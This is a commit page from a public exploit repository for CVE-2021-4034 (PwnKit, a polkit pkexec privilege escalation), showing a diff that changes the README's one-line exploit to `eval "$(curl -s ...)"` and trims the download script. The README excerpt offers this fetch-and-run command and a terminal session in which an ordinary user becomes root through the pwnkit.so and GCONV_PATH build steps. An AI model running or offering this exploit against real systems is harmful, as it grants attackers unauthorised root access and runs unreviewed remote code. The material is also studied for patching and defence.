Merge pull request #20 from owl4ce/patch-3

One-liner: Use `eval` for the commands
This commit is contained in:
Davide Berardi 2022-01-30 15:15:20 +01:00 committed by GitHub
commit b4e5c2547e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 6 additions and 6 deletions

View File

@ -63,21 +63,23 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# One command root # One-liner commands
You can easily exploit the system using a single script, downloadable and executable with this command: You can easily exploit the system using a single script, downloadable and executable with this command:
`( curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh ; cat - ) | sh` ```sh
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
```
```bash ```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ ( curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh ; cat - ) | sh vagrant@ubuntu-impish:~/CVE-2021-4034$ eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034 cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=. mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:. cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
whoami whoami
root root
``` ```

View File

@ -1,7 +1,5 @@
#!/usr/bin/env sh #!/usr/bin/env sh
set -e
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/' URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
for EXPLOIT in "${URL}/cve-2021-4034.c" \ for EXPLOIT in "${URL}/cve-2021-4034.c" \